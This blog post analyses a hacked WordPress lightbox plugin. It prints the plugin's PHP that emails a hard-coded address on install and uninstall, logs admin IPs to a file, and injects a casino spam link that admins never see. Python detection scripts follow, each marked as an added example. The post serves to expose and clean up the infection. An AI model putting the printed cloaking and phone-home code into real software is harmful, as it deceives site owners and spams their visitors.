Dead Eye Creative

WP Handy Lightbox WordPress Plugin Vulnerability and/or Hack

I found a hacked WordPress plugin on one of my client's websites and thought I would post about it to show everyone what I found. The WP Handy Lightbox WordPress plugin was emailing the developer, hansenmartinwew@gmail.com, telling them whether it had been installed or uninstalled. It would log the IPs of the admins. When you went to the site, it would check your IP to see whether you were an admin; if you were not, it would add a spam link on all pages. Inserting code into the situation really could have been a lot more destructive. Cool little script, really. It could do so much more.

This code emails the developer with the location of the install:

function actithelightbox_activate() {
    // Record the activating admin's IP in welcome.txt; this file becomes the
    // list of IPs that are never shown the spam link
    $yourip = $_SERVER['REMOTE_ADDR'];
    $fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
    fwrite($fp, $yourip);
    fclose($fp);
    add_option('redirectlightbox_do_activation_redirect', true);
    // Phone home: email the site URL to the hard-coded address
    session_start();
    $subj = get_option('siteurl');
    $msg = "Plugin Activated";
    $from = get_option('admin_email');
    mail("xxx@gmail.com", $subj, $msg, $from);
    wp_redirect('../wp-admin/options-general.php?page=jquery-lightbox-options');
}

/** Uninstall The Plugin */
function deactthelightbox_deactivate() {
    // Same phone-home on deactivation, so the developer knows the install is gone
    session_start();
    $subj = get_option('siteurl');
    $msg = "Plugin Uninstalled";
    $from = get_option('admin_email');
    mail("xxx@gmail.com", $subj, $msg, $from);
}

This code checks to see if you are an admin, recording admin IP addresses as it goes; if you are not an admin, it does something.

In this case it was inserting a link for a slot machine gambling site.

/** Install Settings Locally */
function outputseo() {
    if (is_user_logged_in()) {
        // Logged-in users (the site's admins) get their IP appended to welcome.txt
        $ip = $_SERVER['REMOTE_ADDR'];
        $filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt';
        $handle = fopen($filename, "r");
        $contents = fread($handle, filesize($filename));
        fclose($handle);
        $filestring = $contents;
        $findme = $ip;
        $pos = strpos($filestring, $findme);
        if ($pos === false) {
            // IP not recorded yet: append it and rewrite the file
            $contents = $contents . $ip;
            $fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
            fwrite($fp, $contents);
            fclose($fp);
        }
    }
}

The code shown here checks if you are an admin; if not, it serves a spam SEO link on the site.

<?php
$ip = $_SERVER['REMOTE_ADDR'];
$filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt';
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
fclose($handle);
$filestring = $contents;
$findme = $ip;
$pos = strpos($filestring, $findme);
if ($pos === false) {
    // Visitor's IP is not in the admin list: emit the spam link
?>
<a href="http://www.slotmachines.us.org">Casino Games</a>
<?php
} else {
    // Known admin IP: emit nothing, so admins never see the link
    echo '';
}
?>
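The three snippets above reduce to a handful of textual indicators, and in practice this kind of thing is found by searching the plugin tree for them, as the author did. The following Python script is an added example (not code from this post or from the plugin) that does that search: it flags mail() with a hard-coded recipient, REMOTE_ADDR being read and written to a file, a strpos() gate, and anchors pointing at a host other than the site's own, then combines the per-line hits into the three behaviours described above. The site hostname, the two PHP samples, and the placeholder address and domain inside them are constructed assumptions.

```python
"""Static triage of plugin PHP sources for the three behaviours described
above: a phone-home mail() on activation/deactivation, the visitor IP being
written to a file (the admin allow-list), and an off-site link that is only
emitted when the visitor IP is not on that list.  Added example; the two PHP
samples are constructed to mirror the page's snippets with placeholder
domains and addresses, not the plugin's real files."""

import re
from dataclasses import dataclass
from pathlib import Path

# Assumed hostname of the site being checked; links to any other host count as off-site.
SITE_HOST = "example-client-site.test"


@dataclass(frozen=True)
class Finding:
    path: str
    line: int
    rule: str
    snippet: str


# Per-line indicators.  Deliberately broad: the goal is to surface files for a
# human to read, not to prove maliciousness by regex.
LINE_RULES = {
    # mail() with a hard-coded recipient literal, as in the activation hook
    "phone-home-mail": re.compile(r"\bmail\s*\(\s*['\"][^'\"]*@[^'\"]*['\"]"),
    # the plugin reads the visitor's IP
    "reads-visitor-ip": re.compile(r"\$_SERVER\s*\[\s*['\"]REMOTE_ADDR['\"]\s*\]"),
    # ...and writes to a file (welcome.txt on the page)
    "writes-file": re.compile(r"\bfwrite\s*\("),
    # substring test used as the "is this IP on the list" gate
    "string-search-gate": re.compile(r"\bstrpos\s*\("),
    # an anchor pointing at a host other than the site itself
    "off-site-anchor": re.compile(
        r"<a\s[^>]*href\s*=\s*['\"]https?://(?!" + re.escape(SITE_HOST) + r")", re.I),
}


def scan_source(path, source):
    """Return one Finding per (line, rule) hit in a PHP source string."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for rule, pattern in LINE_RULES.items():
            if pattern.search(line):
                findings.append(Finding(path, lineno, rule, line.strip()))
    return findings


def classify(findings):
    """Combine per-line hits into the behaviours the post describes."""
    rules = {f.rule for f in findings}
    behaviours = set()
    if "phone-home-mail" in rules:
        behaviours.add("phone-home")
    if {"reads-visitor-ip", "writes-file"} <= rules:
        behaviours.add("admin-ip-logging")
    if {"reads-visitor-ip", "string-search-gate", "off-site-anchor"} <= rules:
        behaviours.add("ip-cloaked-spam")
    return behaviours


def scan_plugin_dir(root):
    """Walk a wp-content/plugins directory and report behaviours per PHP file."""
    report = {}
    for php in Path(root).rglob("*.php"):
        behaviours = classify(scan_source(str(php), php.read_text(errors="replace")))
        if behaviours:
            report[str(php)] = behaviours
    return report


# Constructed sample modelled on the post's snippets (placeholder address and domain).
MALICIOUS_SAMPLE = r"""<?php
function lb_activate() {
    $yourip = $_SERVER['REMOTE_ADDR'];
    $fp = fopen(__DIR__ . '/welcome.txt', 'w');
    fwrite($fp, $yourip);
    fclose($fp);
    mail("attacker@example.com", get_option('siteurl'), "Plugin Activated");
}
$ip = $_SERVER['REMOTE_ADDR'];
$contents = file_get_contents(__DIR__ . '/welcome.txt');
if (strpos($contents, $ip) === false) {
?>
<a href="http://spam-domain.example/">Casino Games</a>
<?php
}
"""

# Constructed benign sample: ordinary enqueue code and a link to the site itself.
BENIGN_SAMPLE = r"""<?php
function lb_enqueue() {
    wp_enqueue_script('lightbox', plugins_url('js/lightbox.js', __FILE__));
}
add_action('wp_enqueue_scripts', 'lb_enqueue');
echo '<a href="https://example-client-site.test/gallery">Gallery</a>';
"""

if __name__ == "__main__":
    for name, src in (("malicious.php", MALICIOUS_SAMPLE), ("benign.php", BENIGN_SAMPLE)):
        hits = scan_source(name, src)
        print(name, sorted(classify(hits)))
        for f in hits:
            print(f"  {f.line:>3} {f.rule:<20} {f.snippet}")
```

Run scan_plugin_dir() against a copy of wp-content/plugins taken from the server; any file that comes back with ip-cloaked-spam or phone-home deserves a line-by-line read, and admin-ip-logging on its own is still worth explaining, since a lightbox has no business recording who logs in.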

Here are screenshots of the code with explanations. Captions of the screenshots:

- Creates spam link if not admin
- This is what the link looked like, in the upper left hand corner (spam link location)
- Copies all of the admin IP addresses
- Emails on uninstall / when deactivating
- Here is the vulnerability. It allows writing to a file, install.php; this is where the link was being added, and you could do more with it (allows the dev to upload to the server)
- Emails the developer upon installation (emails the dev some info)
- Showing specifically the link it was inserting on the site in question
- Checks to see if you are admin; if not, serves link spam
- WordPress vulnerability: this is a backdoor, an easy way for someone from outside to insert code onto your server. You could do a lot of damage with this.
- Showing the emails it was sending on install and uninstall (emails to the dev just install info)
- This was the search where I found part of the code in the first place on the client's server (search code for link spam)
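Because the link is withheld from every IP in welcome.txt, an admin browsing their own site from the usual office connection never sees it; the reliable check is to compare what the site serves to a known admin address with what it serves to an address the plugin has never seen. The Python below is an added example (not code from this post or from the plugin) that does that comparison on two HTML documents and reports off-site links present only in the visitor's copy, treating relative, fragment and protocol-relative links correctly. The site hostname and the two HTML views are constructed assumptions; fetching the two views is left to whatever client you already use.

```python
"""Compare the page a known admin sees with the page an unrecognised visitor
sees and report off-site links present only in the visitor's copy.  Added
example written for this post, not the plugin's code.  The two HTML documents
below are constructed stand-ins for the admin and visitor views of a page,
using placeholder hostnames."""

from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed hostname of the site under test.
SITE_HOST = "example-client-site.test"


class _AnchorCollector(HTMLParser):
    """Collect every href on an <a> tag, in document order."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def external_links(html, site_host=SITE_HOST):
    """Set of hrefs whose host is not the site itself.

    Relative links, fragments and mailto: have no netloc and count as internal;
    protocol-relative links (//host/...) are resolved by urlsplit."""
    collector = _AnchorCollector()
    collector.feed(html)
    external = set()
    for href in collector.hrefs:
        host = urlsplit(href).netloc.lower()
        if host and host != site_host.lower():
            external.add(href)
    return external


def cloaked_links(admin_html, visitor_html, site_host=SITE_HOST):
    """Off-site links served to the visitor but hidden from the admin.

    A non-empty result is the signature of IP-gated spam injection: legitimate
    off-site links (the wordpress.org footer credit, say) appear in both views
    and cancel out."""
    return external_links(visitor_html, site_host) - external_links(admin_html, site_host)


# Constructed: what an admin (IP on the allow-list) receives.
ADMIN_VIEW = """<html><body>
<div id="header"><a href="/">Home</a>
<a href="https://example-client-site.test/gallery">Gallery</a></div>
<p>Powered by <a href="https://wordpress.org/">WordPress</a></p>
</body></html>"""

# Constructed: the same page as received from an IP not on the list; the
# injected anchor sits at the top of the body, matching the "upper left"
# placement described above.
VISITOR_VIEW = """<html><body>
<a href="http://spam-domain.example/">Casino Games</a>
<div id="header"><a href="/">Home</a>
<a href="https://example-client-site.test/gallery">Gallery</a></div>
<p>Powered by <a href="https://wordpress.org/">WordPress</a></p>
</body></html>"""

if __name__ == "__main__":
    for link in sorted(cloaked_links(ADMIN_VIEW, VISITOR_VIEW)):
        print("cloaked off-site link:", link)
```

Fetch both copies logged out, once from the connection the admins normally use and once from one the site has never seen (a phone on mobile data works), because the gate in this plugin keys on IP rather than on login state; an empty result from cloaked_links() on a sample of pages is a reasonable sign the cleanup took.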
